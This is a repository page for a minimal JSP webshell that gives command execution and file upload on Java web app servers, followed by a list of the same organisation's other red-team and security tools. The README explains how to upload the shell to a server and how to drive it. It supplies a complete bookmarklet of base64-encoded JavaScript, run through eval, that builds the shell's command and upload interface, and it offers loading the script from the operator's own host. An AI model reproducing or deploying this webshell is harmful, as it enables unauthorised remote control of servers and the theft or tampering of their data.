• Stars
    star
    281
  • Rank 147,023 (Top 3 %)
  • Language
    Java
  • License
    GNU General Publi...
  • Created over 7 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A super small jsp webshell with file upload capabilities.

A better cmd.jsp

This is a jsp webshell that aims to provide command execution and file upload capability while being as small and widely compatible as possible. To do this, the code for the user interface and client side functionality is contained in javascript which is loaded locally (or hosted elsewhere).

The files:

cmd.jsp

This is the minified version of the webshell.

cmd_readable.jsp

This is the readable version of the webshell. The code is identical to cmd.jsp but with tabs and newlines so that it looks decent.

cmd.war

This is a compressed version of cmd.jsp for use on web app servers that expect .war files.

a.js

This javascript provides the UI and client side functionality.

How to use (Bookmarklet method):

1: Upload cmd.jsp to a java web app server

How this happens is up to you.

2: Browse to /[wherever you put it]/cmd.jsp
3: Use a bookmarklet to add javascript to the page

Add the code below as a link to your bookmarks bar and click it when you are on the cmd.jsp page. It will add the javascript which provides the user interface and client side functionality. (This contains a.js encoded in base64 for reliable copy/pasting.)

javascript:{window.localStorage.embed=window.atob("ZG9jdW1lbnQud3JpdGUoIjxwPiIpOw0KdmFyIGh0bWwgPSAiPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPSdjbWQuanNwJz5cDQo8aW5wdXQgbmFtZT0nYycgdHlwZT10ZXh0PjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUnVuJz5cDQo8L2Zvcm0+PGhyPlwNCjxmb3JtIGFjdGlvbj0nY21kLmpzcCcgbWV0aG9kPXBvc3Q+XA0KVXBsb2FkIGRpcjogPGlucHV0IG5hbWU9J2EnIHR5cGU9dGV4dCB2YWx1ZT0nLic+PGJyPlwNClNlbGVjdCBhIGZpbGUgdG8gdXBsb2FkOiA8aW5wdXQgbmFtZT0nbicgdHlwZT0nZmlsZScgaWQ9J2YnPlwNCjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2InIGlkPSdiJz5cDQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJz5cDQo8L2Zvcm0+PGhyPiI7DQp2YXIgZGl2ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7DQpkaXYuaW5uZXJIVE1MID0gaHRtbDsNCmRvY3VtZW50LmJvZHkuaW5zZXJ0QmVmb3JlKGRpdiwgZG9jdW1lbnQuYm9keS5maXJzdENoaWxkKTsNCg0KdmFyIGhhbmRsZUZpbGVTZWxlY3QgPSBmdW5jdGlvbihldnQpIHsNCiAgICB2YXIgZmlsZXMgPSBldnQudGFyZ2V0LmZpbGVzOw0KICAgIHZhciBmaWxlID0gZmlsZXNbMF07DQoNCiAgICBpZiAoZmlsZXMgJiYgZmlsZSkgew0KICAgICAgICB2YXIgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsNCg0KICAgICAgICByZWFkZXIub25sb2FkID0gZnVuY3Rpb24ocmVhZGVyRXZ0KSB7DQogICAgICAgICAgICB2YXIgYmluYXJ5U3RyaW5nID0gcmVhZGVyRXZ0LnRhcmdldC5yZXN1bHQ7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYicpLnZhbHVlID0gYnRvYShiaW5hcnlTdHJpbmcpOw0KICAgICAgICB9Ow0KDQogICAgICAgIHJlYWRlci5yZWFkQXNCaW5hcnlTdHJpbmcoZmlsZSk7DQogICAgfQ0KfTsNCmlmICh3aW5kb3cuRmlsZSAmJiB3aW5kb3cuRmlsZVJlYWRlciAmJiB3aW5kb3cuRmlsZUxpc3QgJiYgd2luZG93LkJsb2IpIHsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NoYW5nZScsIGhhbmRsZUZpbGVTZWxlY3QsIGZhbHNlKTsNCn0gZWxzZSB7DQogICAgYWxlcnQoJ1RoZSBGaWxlIEFQSXMgYXJlIG5vdCBmdWxseSBzdXBwb3J0ZWQgaW4gdGhpcyBicm93c2VyLicpOw0KfQ==");eval(window.localStorage.embed);};void(0);

How to use (Hosted JS method):

1: Host a.js somewhere
2: Edit cmd.jsp

Remove the contents of the script tag and specify src="[your server]/a.js"

3: Upload cmd.jsp to a java web app server

How this happens is up to you.

4: Browse to /[wherever you put it]/cmd.jsp

More Repositories

1

VECTR

VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
1,329
star
2

msspray

Password attacks and MFA validation against various endpoints in Azure and Office 365
Python
142
star
3

RedTeamSIEM

Repository of resources for configuring a Red Team SIEM using Elastic
Shell
97
star
4

TALR

Threat Alert Logic Repository
Shell
89
star
5

PDBlaster

Python
48
star
6

letItGo

Enumerate and check domains for Azure tenants
Go
43
star
7

indexes

Test case indexes
35
star
8

dredd

Automated detection rule analysis utility
Python
29
star
9

ATTiRe

Attack Tool Timing and Reporting - Structured Attack Logging Format
20
star
10

logstash-input-okta_system_log

Create Logstash events from the Okta API!
Ruby
19
star
11

Burp-Load-Balancer-Cookie-Scanner

Burp extension to find and decode BigIP and Netscaler cookies
Java
15
star
12

sra-taxii2-server

TAXII 2.0 Server implemented in Node JS with MongoDB backend
JavaScript
11
star
13

mitreevalsdb

MITRE Evaluations Database
HTML
9
star
14

logstash-input-okta_enterprise

Ruby
8
star
15

Struts-Checker

Proof of concept Apache Struts/JAR identification and versioning tool for *nix platforms.
Shell
8
star
16

SHADOWSTAR

Internet registry shadowing service
Python
8
star
17

invoke-atomic-attire-logger

ATTiRe logging for Invoke-Atomicredteam
PowerShell
8
star
18

vectr-tools

Sample tools for use with VECTR
Python
6
star
19

wireguard_remote_access

A python(3) script for managing a remote access Wireguard VPN server
Python
6
star
20

covid19-payloads

Phishing payloads for simulating itw COVID-19 related attacks and CTI export for tracking with VECTR
VBA
5
star
21

DMA-offsets

Python
5
star
22

dnstwist-monitor

Monitor client domains for typosquatting attacks using dnstwist + AWS
Python
5
star
23

lifesciences-index

Life Sciences Threat Index
4
star
24

timberlake

AWS attack automation utility
Python
4
star
25

llmnr-sphinx

Ask questions of your network to find a rogue LLMNR server.
Python
3
star
26

sra-stix2-validator

stix2 schema validation for Node JS
JavaScript
3
star
27

marketmaker

Python
3
star
28

repoharvester

Harvest email addresses from commit entries from Github -- faster
Go
2
star
29

azure-security-tools

A collection of tools for azure security
2
star
30

sra-taxii2-server-model

Mongoose model for SRA Taxii 2.0 ecosystem. Shared data model and access across services for ease of maintenance.
JavaScript
1
star
31

sra-taxii2-manager-server

TAXII2 server manager for sra-taxii2-server, provides initial auth management and CRUD operations for TAXII2 server pieces
JavaScript
1
star
32

GetInTheBox

HCL
1
star
33

logstash-input-box_enterprise

A plugin to pull enterprise events from box.com.
Ruby
1
star
34

pdcd

Tool that orchestrates executing Docker containers to build payloads
Python
1
star
35

vectr-sql-migration

A tool to migrate VECTR data from 8.x to 9.x
1
star